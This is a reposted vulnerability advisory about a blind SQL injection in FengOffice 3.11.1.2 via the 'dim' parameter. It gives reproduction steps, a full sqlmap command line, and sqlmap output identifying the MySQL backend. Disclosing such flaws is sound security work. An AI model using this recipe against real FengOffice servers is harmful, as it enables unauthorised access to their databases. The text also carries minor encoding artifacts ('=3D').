Feng Office 3.11.1.2 SQL Injection
FengOffice 3.11.1.2 存在盲 SQL 注入漏洞,攻击者可通过 "dim" 参数利用 sqlmap 工具获取后端 MySQL 数据库信息(版本 5.7.37)。 2025-4-10 21:19:34 Author: cxsecurity.com(查看原文) 阅读量:19 收藏

# Exploit Title: Blind SQL Injection - FengOffice # Date: 7/2024 # Exploit Author: Andrey Stoykov # Version: 3.11.1.2 # Tested on: Ubuntu 22.04 # Blog: http://msecureltd.blogspot.com SQL Injection: 1. Login to application 2. Click on "Workspaces" 3. Copy full URL 4. Paste the HTTP GET request into text file 5. Set the injection point to be in the "dim" parameter value 6. Use SQLMap to automate the process sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim = --fingerprint [...] [12:13:03] [INFO] confirming MySQL [12:13:04] [INFO] the back-end DBMS is MySQL [12:13:04] [INFO] actively fingerprinting MySQL [12:13:05] [INFO] executing MySQL comment injection fingerprint web application technology: Apache back-end DBMS: active fingerprint: MySQL >=3D 5.7 comment injection fingerprint: MySQL 5.7.37 [...]


文章来源: https://cxsecurity.com/issue/WLB-2025040019
如有侵权请联系:admin#unsafe.sh